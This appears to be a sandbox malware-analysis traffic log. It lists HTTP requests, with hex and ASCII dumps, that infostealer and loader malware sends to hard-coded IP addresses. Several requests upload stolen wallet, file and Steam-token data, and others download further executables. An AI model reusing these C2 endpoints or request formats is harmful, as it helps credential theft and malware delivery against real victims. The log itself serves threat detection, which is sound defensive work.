Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 2d 2d 0d 0a Data Ascii: ------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="file"------CFCBFHJECAKEHIECGIEB--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEBHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAKJJDBGCAKKFHIJEGHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 4b 4a 4a 44 42 47 43 41 4b 4b 46 48 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 4b 4a 4a 44 42 47 43 41 4b 4b 46 48 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 4b 4a 4a 44 42 47 43 41 4b 4b 46 48 49 4a 45 47 48 2d 2d 0d 0a Data Ascii: ------JDAKJJDBGCAKKFHIJEGHContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------JDAKJJDBGCAKKFHIJEGHContent-Disposition: form-data; name="message"wallets------JDAKJJDBGCAKKFHIJEGH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDHCAFCGDAAKEBFIJDGHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 2d 2d 0d 0a Data Ascii: ------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="message"files------KJDHCAFCGDAAKEBFIJDG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIECFHDBAAECAAKFHDHHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 2d 2d 0d 0a Data Ascii: ------FIIECFHDBAAECAAKFHDHContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------FIIECFHDBAAECAAKFHDHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FIIECFHDBAAECAAKFHDHContent-Disposition: form-data; name="file"------FIIECFHDBAAECAAKFHDH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKFCGHIDHCBGDHJKEBHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 2d 2d 0d 0a Data Ascii: ------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="message"ybncbhylepme------EHJKFCGHIDHCBGDHJKEB--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJDHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 2d 2d 0d 0a Data Ascii: ------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GIJJKKJJDAAAAAKFHJJD--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /thebig/stories.exe HTTP/1.1Host: 176.113.115.203
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 34 33 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006431001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 34 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006440001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 34 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006441001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Fri, 15 Nov 2024 12:59:20 GMTIf-None-Match: "673745a8-1ba800"
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHDHJEBGHJKFIECBGCBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 43 46 32 31 31 36 46 38 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 2d 2d 0d 0a Data Ascii: ------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="hwid"BCCF2116F8A11720009369------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="build"mars------GDHDHJEBGHJKFIECBGCB--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 34 34 32 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006442031&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 34 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006443001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 43 46 32 31 31 36 46 38 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 2d 2d 0d 0a Data Ascii: ------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="hwid"BCCF2116F8A11720009369------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="build"mars------IJDBKKJKJEBFBGCBAAFI--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
